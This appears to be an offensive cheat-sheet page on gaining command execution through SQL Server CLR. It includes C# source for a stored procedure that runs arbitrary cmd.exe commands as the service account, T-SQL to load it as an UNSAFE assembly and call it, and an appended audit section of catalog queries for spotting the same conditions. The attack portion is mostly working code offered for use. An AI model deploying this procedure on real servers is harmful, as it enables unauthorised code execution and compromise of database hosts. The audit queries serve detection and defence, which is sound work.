Operator On The Wire

CLR-RCE

Use when CLR is enabled or TRUSTWORTHY DB escalation applies.

Check

SELECT name,value_in_use FROM sys.configurations WHERE name='clr enabled';

C# DLL (script)

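using System;
using System.Data.SqlTypes;
using Microsoft.SqlServer.Server;

public class CLRExec
{
    // Exposed to T-SQL as a CLR stored procedure.
    [SqlProcedure]
    public static void RunCmd(SqlString cmd)
    {
        // cmd.Value unwraps the SqlString; the process runs as the SQL Server service account.
        System.Diagnostics.Process.Start("cmd.exe", "/c " + cmd.Value);
    }
}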

Import & Execute

CREATE ASSEMBLY myexec FROM 'C:\CLRExec.dll' WITH PERMISSION_SET=UNSAFE;
GO
-- CREATE PROCEDURE must be the first statement in its batch
CREATE PROCEDURE sp_cmd @cmd NVARCHAR(MAX) AS EXTERNAL NAME myexec.[CLRExec].RunCmd;
GO
EXEC sp_cmd 'whoami';
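
Audit

The following T-SQL is an added example, not part of the original page: it checks an instance for the conditions this technique relies on (CLR enabled, TRUSTWORTHY databases, non-SAFE user assemblies and the SQL objects bound to them). It uses only system catalog views; run the third query in each user database.

```sql
-- Added audit example (not from the original page).

-- 1. Instance-level CLR settings.
--    'clr strict security' only exists on SQL Server 2017 and later.
SELECT name, value_in_use
FROM sys.configurations
WHERE name IN ('clr enabled', 'clr strict security');

-- 2. Databases marked TRUSTWORTHY, and whether the owner is a sysadmin.
--    msdb is TRUSTWORTHY by default, so it is excluded here.
SELECT d.name                                  AS database_name,
       SUSER_SNAME(d.owner_sid)                AS owner_login,
       IS_SRVROLEMEMBER('sysadmin',
                        SUSER_SNAME(d.owner_sid)) AS owner_is_sysadmin
FROM sys.databases AS d
WHERE d.is_trustworthy_on = 1
  AND d.name <> 'msdb';

-- 3. User-defined assemblies in the current database that are not SAFE,
--    with any procedures/functions mapped to them via EXTERNAL NAME.
SELECT a.name                    AS assembly_name,
       a.permission_set_desc,    -- EXTERNAL_ACCESS or UNSAFE_ACCESS
       a.create_date,
       a.modify_date,
       USER_NAME(a.principal_id) AS assembly_owner,
       OBJECT_SCHEMA_NAME(m.object_id) + '.'
         + OBJECT_NAME(m.object_id) AS sql_object,
       m.assembly_class,
       m.assembly_method
FROM sys.assemblies AS a
LEFT JOIN sys.assembly_modules AS m
       ON m.assembly_id = a.assembly_id
WHERE a.is_user_defined = 1
  AND a.permission_set_desc <> 'SAFE_ACCESS'
ORDER BY a.create_date DESC;
```

A recently created UNSAFE_ACCESS assembly with a single procedure bound to it, in a database that has no documented CLR use, is the pattern to investigate.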